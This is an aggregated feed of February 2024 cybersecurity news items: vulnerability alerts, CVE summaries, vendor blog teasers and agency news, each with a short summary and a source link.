https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-062024
In memoriam: Dr Alan Solomon
2024-02-14T10:30:00Z | 1707906600

We were very sorry to learn of the passing of industry pioneer Dr Alan Solomon earlier this week. Read more

https://www.virusbulletin.com/blog/2024/02/memoriam-dr-alan-solomon/
Scanning Activity for CVE-2024-22024 (XXE) Vulnerability in Ivanti
2024-02-14T06:00:00Z | 1707890400

https://www.akamai.com/blog/security-research/2024/feb/scanning-activity-ivanti-cve-february-2024
High Threat Security Alert (A24-02-09): Multiple Vulnerabilities in Microsoft Products (February 2024)
2024-02-14T04:00:00Z | 1707883200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-02-10): Multiple Vulnerabilities in QNAP Products
2024-02-14T04:00:00Z | 1707883200

QNAP has published a security advisory to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-02-11): Multiple Vulnerabilities in Adobe Reader/Acrobat
2024-02-14T04:00:00Z | 1707883200

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
We’ve hired Ash Devata as CEO at GreyNoise, and I get my dream job.
2024-02-14T00:00:00Z | 1707868800

See why Andrew Morris, GreyNoise's founder, is thrilled to step into his dream role as Chief Architect, focusing on technical innovation and AI strategy. With Ash Devata joining as CEO, Andrew is excited to partner with someone known for their customer focus and industry expertise, ensuring GreyNoise continues to thrive in the ever-evolving landscape of cybersecurity.

https://www.greynoise.io/blog/weve-hired-ash-devata-as-ceo-at-greynoise-and-i-get-my-dream-job
Introducing Cato EPP: SASE-Managed Protection for Endpoints
2024-02-13T12:01:52Z | 1707825712

Endpoints Under Attack As cyber threats continue expanding, endpoints have become ground zero in the fight to protect corporate resources.  Advanced cyber threats pose a serious risk, so protecting corporate endpoints and data should be a high priority.  Endpoint Protection Platforms (EPPs) are the first line of defense against endpoint cyber-attacks.  It provides malware protection,... The post Introducing Cato EPP: SASE-Managed Protection for Endpoints appeared first on Cato Networks.

https://www.catonetworks.com/blog/introducing-cato-epp-sase-managed-protection-for-endpoints/
Unleashing the power of cloud with containerisation
2024-02-13T09:11:03Z | 1707815463

New NCSC guidance describes how organisations can make the most of containerisation.

https://www.ncsc.gov.uk/blog-post/unleashing-the-power-of-cloud-with-containerisation
Jaanuar küberruumis: arvukad teenustõkestusründed ja veebipettused
2024-02-13T08:00:54Z | 1707811254

Riigi Infosüsteemi Amet (RIA) kirjutab oma kuukokkuvõttes, et paljusid asutusi ja ettevõtteid tabasid jaanuaris teenustõkestusründed ning kelmid kimbutasid Facebook Marketplace’is kaupa müünud inimesi.

https://ria.ee/uudised/jaanuar-kuberruumis-arvukad-teenustokestusrunded-ja-veebipettused
Is Your Network Infrastructure Ready for More IoT Devices?
2024-02-13T08:00:00Z | 1707811200

Stay ahead of challenges with new Catalyst 9300-M models The post Is Your Network Infrastructure Ready for More IoT Devices? appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/02/is-your-network-infrastructure-ready-for-more-iot-devices/
Say Goodbye to Monolithic EdgeWorkers: Introducing Flexible Composition (Part 2)
2024-02-13T08:00:00Z | 1707811200

https://www.akamai.com/blog/edge/2024/feb/introducing-flexible-composition-part-2
Take the first step to an open XDR solution with Vectra AI Platform Integrations by Zoey Chu
2024-02-13T00:00:00Z | 1707782400

Technology integrations are the answer to achieving an open XDR solution. Read how Vectra AI Platform Integrations can help you accomplish an XDR strategy with your current security technology stack.

https://www.vectra.ai/blog/take-the-first-step-to-an-open-xdr-solution-with-vectra-ai-platform-integrations
Why Windows can’t follow WSL symlinks
2024-02-12T14:30:25Z | 1707748225

Did you know that symbolic links (or symlinks) created through Windows Subsystem for Linux (WSL) can’t be followed by Windows? I recently encountered this rather frustrating issue as I’ve been using WSL for my everyday work over the last few months. No doubt others have noticed it as well, so I wanted […]

https://blog.trailofbits.com/2024/02/12/why-windows-cant-follow-wsl-symlinks/
Data Matters ? Is Your API Security Data Rich or Data Poor?
2024-02-12T14:00:00Z | 1707746400

Taking a data-rich approach to security is the most effective way to stay a step ahead of today?s quickly evolving API threats.

https://www.akamai.com/blog/security/2024/feb/data-matters-api-security-data-rich-data-poor
Embracing a Channel-First Approach in a SASE-based XDR and EPP Era
2024-02-12T10:11:24Z | 1707732684

Today, we have the privilege of speaking with Frank Rauch, Global Channel Chief of Cato Networks, as he shares his insights on our exciting announcement about Cato introducing the world’s first SASE-based, extended detection and response (XDR) and the first SASE-managed endpoint protection platform (EPP). Together, Cato XDR and Cato EPP mark the technology industry’s... The post Embracing a Channel-First Approach in a SASE-based XDR and EPP Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/embracing-a-channel-first-approach-in-a-sase-based-xdr-and-epp-era/
Dia da Internet Mais Segura 2024 destaca Inteligência Artificial como tema central
2024-02-12T00:00:00Z | 1707696000

As comemorações decorreram de 6 a 8 de fevereiro, em Viseu, para assinalar o Dia da Internet Mais Segura, uma iniciativa assinalada, anualmente, em cerca de 180 países pelo mundo, que sob o mote "Juntos por uma Internet Melhor", procura promover uma utilização segura e responsável das tecnologias digitais, especialmente entre crianças e jovens.A 21.ª edição do Dia da Internet Mais Segura (SID Summit 2024), foi organizada pelo Consórcio do Centro Internet Segura, sob a coordenação do Centro Nacional de Cibersegurança (CNCS) e contou com o apoio do Instituto Politécnico de Viseu (IPV. A Inteligência Artificial deu o mote às comemorações, que tiveram como evento em destaque o fórum “Zoom na IA: Explorar Dimensões Invisíveis”.O Fórum, que decorreu na Aula Magna do IPV, juntou especialistas de várias áreas, professores e jovens, para debater os mitos, vantagens e desvantagens desta tecnologia, além de abordar a sua aplicação na educação, práticas pedagógicas e preocupações dos jovens e contou com a presença do Secretário de Estado da Digitalização e Modernização Administrativa, Mário Campolargo. Além das discussões técnicas, o evento também proporcionou momentos de entretenimento e reflexão, como a apresentação da peça de teatro "ID a tua marca na NET", voltada para a comunidade educativa e o público em geral.No dia 7 de fevereiro, o SID Summit 2024 continuou as comemorações, com a realização das Oficinas Temáticas Internet Segura, nas instalações do Instituto Português do Desporto e Juventude de Viseu, onde foram realizados diversos workshops com o objetivo de sensibilizar a comunidade educativa para uma utilização mais saudável, segura e consciente dos ambientes digitais.Além das atividades realizadas nos dias 6 e 7 de fevereiro, o evento estendeu-se até o dia 8 de fevereiro, data em que iniciou o Roadshow Nacional ZigZaga na Net - Navegar a Cores, em várias escolas de Viseu. Este livro para colorir, concebido para educar as crianças sobre segurança online de forma lúdica e acessível, representa mais um esforço do Centro Internet Segura para promover uma utilização consciente e responsável da Internet desde tenra idade. Essa ação destaca o compromisso contínuo do evento em alcançar e educar todos os segmentos da sociedade, garantindo um ambiente digital mais seguro para as gerações futuras.O Consórcio Centro Internet Segura, responsável pela iniciativa, é composto por várias entidades, incluindo o Centro Nacional de Cibersegurança, a Direção-Geral da Educação, o Instituto Português do Desporto e Juventude, a Fundação para a Ciência e a Tecnologia, a Associação Portuguesa de Apoio à Vítima, a Fundação Altice e a Microsoft Portugal.Este evento foi uma oportunidade para refletir sobre os desafios e oportunidades trazidos pela Inteligência Artificial e reforçar o compromisso com uma internet mais segura e inclusiva para todos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135845/dia-da-internet-mais-segura-2024-destaca-inteligencia-artificial-como-tema-central
CNCS testa mecanismos de articulação entre várias entidades com Exercício de Cibersegurança dedicado às Eleições
2024-02-12T00:00:00Z | 1707696000

No dia 9 de fevereiro, o Centro Nacional de Cibersegurança realizou, nas suas instalações, um Exercício de Cibersegurança dedicado às Eleições, cujo objetivo passou por testar os diferentes mecanismos de articulação entre as várias entidades envolvidas, bem como reforçar o conhecimento situacional e especializado, que permita melhorar a sua capacidade de ciber-resiliência durante o ato eleitoral. A ação decorreu nas instalações do CNCS, tendo como entidades participantes: o Centro Nacional de Cibersegurança (CNCS), a Comissão Nacional de Eleições (CNE), a Entidade Reguladora para a Comunicação Social (ERC), a Lusa - Agência de Notícias de Portugal, o Ministério Público – Gabinete Cibercrime, a Secretaria-Geral do Ministério da Administração Interna (SGMAI), a Polícia Judiciária (PJ) e o Serviço de Informação e Segurança (SIS). Para este exercício dedicado às Eleições, o primeiro organizado pelo CNCS, de nível estratégico e não técnico, foi definido como cenário, a ocorrência de uma série de incidentes associados a campanhas de desinformação, que incluíram a disseminação de sondagens fraudulentas, documentos e notícias falsas, apropriação de templates dos Órgãos de Comunicação Social, notícias falsas associadas a aspetos logísticos do processo eleitoral, entre outros marcos narrativos. No balanço do Exercício de Cibersegurança, foi destacado que, perante os vários cenários apresentados, as diferentes entidades envolvidas demonstraram estar empenhadas, tendo sido várias as atividades de colaboração na efetiva preparação da cibersegurança dos atos eleitorais. Ficou demonstrado existir um conhecimento amplo das competências de cada uma das entidades em relação às demais e ficou demonstrada a consciência da necessidade de colaboração. Foram, ainda, realçadas as dificuldades sentidas quanto à sensibilização dos partidos políticos para as questões da cibersegurança, facto que aumenta o risco.No âmbito das competências do Centro Nacional de Cibersegurança (CNCS), enquanto Autoridade Nacional de Cibersegurança, enquadram-se as competências orgânicas de promover e assegurar a articulação e a cooperação entre os vários intervenientes e responsáveis nacionais na área da cibersegurança e de desenvolver as capacidades nacionais de prevenção, monitorização, deteção, reação, análise e correção destinadas a fazer face a incidentes de cibersegurança e ciberataques. Neste contexto, o CNCS organiza e realiza, anualmente, exercícios de cibersegurança, que permitem avaliar o grau de preparação e a maturidade das diversas entidades para lidar com incidentes de grande dimensão.

https://dyn.cncs.gov.pt/pt/detalhe/art/135846/cncs-testa-mecanismos-de-articulacao-entre-varias-entidades-com-exercicio-de-ciberseguranca-dedicado-as-eleicoes
Governments Have Zero Reason To Be Flipping Mad About Open Source SDR Tech
2024-02-12T00:00:00Z | 1707696000

Discover insights into the drawbacks of a proposed ban on open-source SDR, and explore the argument for enhanced security measures to strike a balance between innovation and safeguarding against vulnerabilities in wireless systems.

https://www.greynoise.io/blog/governments-have-zero-reason-to-be-flipping-mad-about-open-source-sdr-tech
The 5-Step Action Plan to Becoming CISO
2024-02-11T07:53:37Z | 1707638017

The post The 5-Step Action Plan to Becoming CISO appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-5-step-action-plan-to-becoming-ciso/
iboss launches ChatGPT Risk Module for enhanced AI interaction security
2024-02-09T19:00:45Z | 1707505245

iboss, the expert in cloud-delivered cybersecurity, has recently launched its innovative ChatGPT Risk Module. This advanced addition to its Zero Trust Security Service Edge (SSE) solution is specifically designed to monitor and secure user interactions with ChatGPT, a leading artificial intelligence technology. This innovative initiative is aimed at ensuring exceptional data security and compliance in dynamic digital environments. The post iboss launches ChatGPT Risk Module for enhanced AI interaction security appeared first on iboss.

https://www.iboss.com/news/iboss-launches-chatgpt-risk-module-for-enhanced-ai-interaction-security/
Master fuzzing with our new Testing Handbook chapter
2024-02-09T14:00:13Z | 1707487213

Our latest addition to the Trail of Bits Testing Handbook is a comprehensive guide to fuzzing: an essential, effective, low-effort method to find bugs in software that involves repeatedly running a program with random inputs to cause unexpected results. At Trail of Bits, we don’t just rely on standard static analysis. We tailor our approach […]

https://blog.trailofbits.com/2024/02/09/master-fuzzing-with-our-new-testing-handbook-chapter/
Security Alert (A24-02-06): Multiple Vulnerabilities in Microsoft Edge
2024-02-09T04:00:00Z | 1707451200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-02-07): Multiple Vulnerabilities in Fortinet Products
2024-02-09T04:00:00Z | 1707451200

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-02-08): Vulnerability in Ivanti Products
2024-02-09T04:00:00Z | 1707451200

Ivanti has published a security advisory to address a vulnerability in Ivanti systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato XDR Storyteller – Integrating Generative AI with XDR to Explain Complex Security Incidents
2024-02-08T16:07:24Z | 1707408444

Generative AI (à la OpenAI’s GPT and the likes) is a powerful tool for summarizing information, transformations of text, transformation of code, all while doing so using its highly specialized ability to “speak” in a natural human language. While working with GPT APIs on several engineering projects an interesting idea came up in brainstorming, how... The post Cato XDR Storyteller – Integrating Generative AI with XDR to Explain Complex Security Incidents appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-xdr-storyteller-integrating-generative-ai-with-xdr-to-explain-complex-security-incidents/
Growth Stack Media Appointed as FIRST's Agency of Record
2024-02-08T13:30:00Z | 1707399000

FIRST Elevates Public Relations Efforts with Appointment of Growth Stack Media as Agency of Record

https://www.first.org/newsroom/announce/20240208
Denial-of-service attacks will continue in 2024 as well
2024-02-08T13:19:57Z | 1707398397

Denial-of-service attacks aim to cause momentary harm to, for example, websites. Denial-of-service attacks by hacktivists were especially visible in Finland in 2023. The same seems to continue this year.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-will-continue-2024-well
Denial-of-service attacks will continue in 2024 as well
2024-02-08T13:19:57Z | 1707398397

Denial-of-service attacks aim to cause momentary harm to, for example, websites. Denial-of-service attacks by hacktivists were especially visible in Finland in 2023. The same seems to continue this year.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-will-continue-2024-well
Uus infoteenus on toeks elu keerukaimatel hetkedel
2024-02-08T07:41:07Z | 1707378067

Lähedase surm on raske kogemus, millega kaasneb lisaks keerukatele emotsioonidele ka mitmeid asjaajamisi ja kohustusi. Uus sündmusteenus koondab kogu lähedase surmaga seotud info, et muuta asjaajamine inimkesksemaks.

https://ria.ee/uudised/uus-infoteenus-toeks-elu-keerukaimatel-hetkedel
Security Alert (A24-02-05): Multiple Vulnerabilities in Cisco Products
2024-02-08T04:00:00Z | 1707364800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Battling Ransomware One Tag At A Time
2024-02-08T00:00:00Z | 1707350400

Discover how CISA's Ransomware Vulnerability Warning Pilot (RVWP) and GreyNoise tags can bolster your cybersecurity. Learn to utilize actionable intelligence from GreyNoise to combat ransomware threats and protect your organization's technology stack, from collaboration tools to middleware services. Stay ahead of diverse ransomware attacks with our in-depth analysis and strategic defense guidance.

https://www.greynoise.io/blog/battling-ransomware-one-tag-at-a-time
NCSC and partners issue warning about state-sponsored cyber attackers hiding on critical infrastructure networks
2024-02-07T18:33:25Z | 1707330805

GCHQ’s National Cyber Security Centre and partners share details of how threat actors are using built-in tools to camouflage themselves on victims’ systems.

https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-warning-about-state-sponsored-cyber-attackers-hiding-on-critical-infrastructure-networks
SonicOS SSL-VPN Improper Authentication
2024-02-07T16:44:27Z | 1707324267

An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication.This issue affects only firmware version SonicOS 7.1.1-7040. CVE: CVE-2024-22394 Last updated: Feb. 7, 2024, 4:44 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003
The AnyDesk Breach: Overview and Recommendations
2024-02-07T15:00:00Z | 1707318000

https://www.akamai.com/blog/security-research/2024/feb/anydesk-breach-what-to-know-mitigations-and-recommendations
Binary type inference in Ghidra
2024-02-07T14:00:39Z | 1707314439

Trail of Bits is releasing BTIGhidra, a Ghidra extension that helps reverse engineers by inferring type information from binaries. The analysis is inter-procedural, propagating and resolving type constraints between functions while consuming user input to recover additional type information. This refined type information produces more idiomatic decompilation, enhancing reverse engineering comprehension. The […]

https://blog.trailofbits.com/2024/02/07/binary-type-inference-in-ghidra/
Akamai Named an Overall Leader for Zero Trust Network Access
2024-02-07T14:00:00Z | 1707314400

https://www.akamai.com/blog/security/2024/feb/akamai-named-an-overall-leader-for-zero-trust-network-access
Security Alert (A24-02-03): Multiple Vulnerabilities in Android
2024-02-07T04:00:00Z | 1707278400

Google has released Android Security Bulletin February 2024 to fix multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-02-04): Multiple Vulnerabilities in Google Chrome
2024-02-07T04:00:00Z | 1707278400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Encrypted Command and Control: Can You Really Cover Your Tracks? by Luke Richards
2024-02-07T00:00:00Z | 1707264000

Why uncovering command and control channels is key to stopping today’s cyber attacks.

https://www.vectra.ai/blog/encrypted-command-and-control-can-you-really-cover-your-tracks
The Web Scraping Problem, Part 3: Protecting Against Botnets
2024-02-06T14:00:00Z | 1707228000

https://www.akamai.com/blog/security/2024/feb/the-web-scraping-problem-part-three-protecting-against-botnets
Stop Scrapers and Scalpers with Akamai Content Protector
2024-02-06T14:00:00Z | 1707228000

https://www.akamai.com/blog/security/2024/feb/stop-scrapers-and-scalpers-with-akamai-content-protector
Cato XDR Story Similarity – A Data Driven Incident Comparison and Severity Prediction Model
2024-02-06T13:51:29Z | 1707227489

At Cato our number one goal has always been to simplify networking and security, we even wrote it on a cake once so it must be true: Figure 1 – A birthday cake Applying this principle to our XDR offering, we aimed at reducing the complexity of analyzing security and network incidents, using a data-driven... The post Cato XDR Story Similarity – A Data Driven Incident Comparison and Severity Prediction Model appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-xdr-story-similarity-a-data-driven-incident-comparison-and-severity-prediction-model/
The National Cyber Security Centre Finland’s weekly review – 05/2024
2024-02-06T10:16:55Z | 1707214615

This week, we report on recent police impersonation scam calls. On a more positive note, next week we will be celebrating Media Literacy Week, and sign-ups for the Tietoturva 2024 information security seminar are now open.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-052024
The National Cyber Security Centre Finland’s weekly review – 05/2024
2024-02-06T10:16:55Z | 1707214615

This week, we report on recent police impersonation scam calls. On a more positive note, next week we will be celebrating Media Literacy Week, and sign-ups for the Tietoturva 2024 information security seminar are now open.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-052024
TP-Link ER7206 Omada Gigabit VPN Router uhttpd PPTP client Command injection Vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1853
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1850
TP-Link ER7206 Omada Gigabit VPN Router uhttpd web group command injection vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1858
TP-Link ER7206 Omada Gigabit VPN Router uhttpd PPTP global config Command injection Vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1856
TP-Link ER7206 Omada Gigabit VPN Router uhttpd ipsec command injection vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1854
TP-Link ER7206 Omada Gigabit VPN Router uhttpd GRE command injection vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1855
TP-Link ER7206 Omada Gigabit VPN Router uhttpd web filtering Command injection Vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1859
TP-Link ER7206 Omada Gigabit VPN Router uhttpd Wireguard VPN command injection vulnerability
2024-02-06T00:00:00Z | 1707177600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1857
Secure64 Announces a New COO: Brian Sloat
2024-02-05T19:19:44Z | 1707160784

Colorado—Secure64 Inc. The leading provider of Carrier and Enterprise security and DNS solutions is proud to announce the appointment of Brian Sloat as Chief Operating Officer (“COO”) effective February 1, 2024.  “On behalf of the board and the entire team, it is with great pleasure that we announce the appointment of our new Chief Operating […]

https://secure64.com/2024/02/05/secure64-announces-a-new-coo-brian-sloat/
Improving the state of Cosmos fuzzing
2024-02-05T14:00:53Z | 1707141653

Cosmos is a platform enabling the creation of blockchains in Go (or other languages). Its reference implementation, Cosmos SDK, leverages strong fuzz testing extensively, following two approaches: smart fuzzing for low-level code, and dumb fuzzing for high-level simulation. In this blog post, we explain the differences between these approaches and show how […]

https://blog.trailofbits.com/2024/02/05/improving-the-state-of-cosmos-fuzzing/
What to Do When Your VPN Provider Suffers from Zero-Day Vulnerabilities
2024-02-05T13:00:00Z | 1707138000

https://www.akamai.com/blog/security/2024/feb/vpn-provider-suffers-from-zero-day-vulnerabilities
The Web Scraping Problem, Part 2: Use Cases that Require Scraping
2024-02-05T08:00:00Z | 1707120000

https://www.akamai.com/blog/security/2024/feb/the-web-scraping-problem-part-2
RIA: mõjuga küberintsidentide arv kasvas aastaga veerandi võrra
2024-02-05T07:48:30Z | 1707119310

Riigi Infosüsteemi Amet (RIA) registreeris mullu 3314 mõjuga küberintsidenti ehk 24 protsenti rohkem kui 2022. aastal: rekordtasemele tõusid nii poliitilise taustaga ummistusründed kui ka inimestelt ja ettevõtetelt raha väljameelitamiseks mõeldud pettused.

https://ria.ee/uudised/ria-mojuga-kuberintsidentide-arv-kasvas-aastaga-veerandi-vorra
Security Alert (A24-02-02): Multiple Vulnerabilities in QNAP Products
2024-02-05T04:00:00Z | 1707105600

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Chaos Communication Congress (37C3) recap
2024-02-02T14:00:01Z | 1706882401

Last month, two of our engineers attended the 37th Chaos Communication Congress (37C3) in Hamburg, joining thousands of hackers who gather each year to exchange the latest research and achievements in technology and security. Unlike other tech conferences, this annual gathering focuses on the interaction of technology and society, covering such topics as politics, entertainment, […]

https://blog.trailofbits.com/2024/02/02/chaos-communication-congress-37c3-recap/
Security Alert (A24-02-01): Multiple Vulnerabilities in Microsoft Edge
2024-02-02T04:00:00Z | 1706846400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
What We're Reading: January 2024
2024-02-02T00:00:00Z | 1706832000

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

https://www.greynoise.io/blog/what-were-reading-february-2024
Cybersecurity Unites Across Borders: FETTA Project Launched to Strengthen EU Cyber Threat Intelligence
2024-02-01T15:20:00Z | 1706800800

One of the key cybersecurity challenges in Europe is reducing reliance on threat intelligence from non-EU countries. The FETTA (Federated European Team for Threat Analysis) project aims to address this issue by creating a federated team that spans across borders, providing Cyber Threat Intelligence (CTI) products and tooling.

https://cert.pl/en/posts/2024/02/fetta/
Frog4Shell ? FritzFrog Botnet Adds One-Days to Its Arsenal
2024-02-01T15:00:00Z | 1706799600

https://www.akamai.com/blog/security-research/2024/feb/fritzfrog-botnet-new-capabilities-log4shell
Riigi autentimisteenuse iseteeninduskeskkond võimaldab riigi e-teenustest teise seadme kaudu välja logida
2024-02-01T14:07:02Z | 1706796422

Riigi autentimisteenusel on nüüd iseteeninduskeskkond minuautentimine.ria.ee, milles on võimalik näha ja sulgeda enda kehtivaid autentimisteenuse seansse. Esialgu kuvatakse seal sisselogimised nendesse e-teenustesse, mis kasutavad riigi SSO teenust.

https://ria.ee/uudised/riigi-autentimisteenuse-iseteeninduskeskkond-voimaldab-riigi-e-teenustest-teise-seadme
The Noname Security 3.26 Release Supports Integration with Fastly
2024-02-01T14:00:00Z | 1706796000

https://www.akamai.com/blog/security/2024/aug/the-noname-security-3-26-release
Busting the App Count Myth
2024-02-01T10:21:29Z | 1706782889

Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status etc. Users can then apply different security measures, including setting firewall, CASB and DLP policies, based on the apps categories and attributes.   It makes sense to conclude that the more... The post Busting the App Count Myth  appeared first on Cato Networks.

https://www.catonetworks.com/blog/busting-the-app-count-myth/
Deep JavaScript Tracing: Unleashing Advanced Phishing Detection
2024-01-31T15:39:00Z | 1706715540

In this blog post, we are introducing JavaScript tracing, a new technology we recently added to Joe Sandbox Cloud, that makes our platform even better at spotting and analyzing complex phishing attacks.Joe Sandbox already has a rich set of technologies for phishing detection. Those include image recognition, OCR, DOM based signatures and many more. However what is missing is capability for deep analysis of JavaScript executed with the web browser. Most phishing pages use JavaScript for obfuscation and hiding of key elements. JavaScript traces are a gold-mine for detection artifacts. Enhancing Web Page Inspection: The Power of JavaScript Tracing With Joe Sandbox v39 Ruby we have implemented stealth JavaScript tracing within the Chrome web browser.  Cloud Pro customers can enable JavaScript Tracing in the Code Analysis section on the submission page:With the tracing enabled Joe Sandbox can now log function calls with parameters, object getters, setters and instantiations. Malware Analysts can download the full JavaScript tracing from the report overview page and dig into all the tracing details:Why It's a Game-Changer: From Obfuscation to ClarityJavaScript Tracing also significantly boosts Joe Sandbox’s capacity to deeply analyze phishing attacks. Phishing sites often employ complex obfuscation techniques to conceal their malicious intent. With this technology, analysts can uncover and understand these tactics, such as dynamic HTML content decoding and script injections. This capability not only improves the detection rates but also provides analyst with detailed, human-readable reports for further analysis. Lets take a recent HTML file which is sent to victims as e-Mail attachment. The content is hard to understand as it uses atob-array obfuscation:Antivirus detection is very low:If we run that HTML sample in Joe Sandbox however and enable JavaScript tracing we get several interesting signature hits:Full Analysis LinkWe can see from the signature overview the data passed to document.write(). Thanks to the trace log we can have a look at that data:Based on this find we see that the final page is likely phishing for Microsoft credentials since it is loading the favicon from Microsoft. This is confirmed by the image recognition engine:ConclusionThanks to JavaScript tracing analysts get a very deep view into the execution of JavaScript running in a web browser. The tracing boost detection precision and provides additional insights such as what obfuscations are used, evasion tactics and general behavior of malicious JavaScript code. Analysts can enable JavaScript tracing on the submission page - Code Analysis section. The tracing log can be download via the analysis detail page. JavaScript tracing is available in Joe Sandbox Cloud v39 Ruby. Would you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/7596105299118979565
Introducing DIFFER, a new tool for testing and validating transformed programs
2024-01-31T14:30:48Z | 1706711448

We recently released a new differential testing tool, called DIFFER, for finding bugs and soundness violations in transformed programs. DIFFER combines elements from differential, regression, and fuzz testing to help users find bugs in programs that have been altered by software rewriting, debloating, and hardening tools. We used DIFFER to evaluate 10 […]

https://blog.trailofbits.com/2024/01/31/introducing-differ-a-new-tool-for-testing-and-validating-transformed-programs/
How Akamai Volunteers Helped Restore Costa Rica?s Most Polluted Beach
2024-01-31T14:00:00Z | 1706709600

https://www.akamai.com/blog/sustainability/2024/jan/akamai-volunteers-helped-restore-costa-ricas-most-polluted-beach
The National Cyber Security Centre Finland’s weekly review – 04/2024
2024-01-31T13:24:55Z | 1706707495

This week, we talk about tax-themed scams, which have seen a strong increase, and user account hijacking. Scammers are skilled at coming up with scams centred around current topics, with their current topics of choice being data breaches and tax returns. At the ‘Kyberala murroksessa’ seminar, the audience showed great interest in new EU regulations, among other things.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-042024
The National Cyber Security Centre Finland’s weekly review – 04/2024
2024-01-31T13:24:55Z | 1706707495

This week, we talk about tax-themed scams, which have seen a strong increase, and user account hijacking. Scammers are skilled at coming up with scams centred around current topics, with their current topics of choice being data breaches and tax returns. At the ‘Kyberala murroksessa’ seminar, the audience showed great interest in new EU regulations, among other things.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-042024
High Threat Security Alert (A24-01-27): Multiple Vulnerabilities in GitLab
2024-01-31T04:00:00Z | 1706673600

GitLab has released 16.5.8, 16.6.6, 16.7.4 and 16.8.1 to address multiple vulnerabilities in various versions of GitLab.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-28): Multiple Vulnerabilities in Google Chrome
2024-01-31T04:00:00Z | 1706673600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-29): Multiple Vulnerabilities in Linux Operating Systems
2024-01-31T04:00:00Z | 1706673600

Multiple vulnerabilities are found in all versions of the Linux GNU C Library (glibc) from version 1.04 to the latest release version 2.38.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-43609
2024-01-30T15:32:00Z | 1706628720

CWE-285: IMPROPER AUTHORIZATION In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could obtain access to sensitive information or cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2023-43609
CVE-2023-51761
2024-01-30T15:31:00Z | 1706628660

CWE-287:IMPROPER AUTHENTICATION In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could bypass authentication and acquire admin capabilities.

https://claroty.com/team82/disclosure-dashboard/cve-2023-51761
CVE-2023-49716
2024-01-30T15:27:00Z | 1706628420

CWE-77: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an authenticated user with network access could execute arbitrary commands from a remote computer.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49716
CVE-2023-46687
2024-01-30T15:27:00Z | 1706628420

CWE-77: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer.

https://claroty.com/team82/disclosure-dashboard/cve-2023-46687
The Web Scraping Problem: Part 1
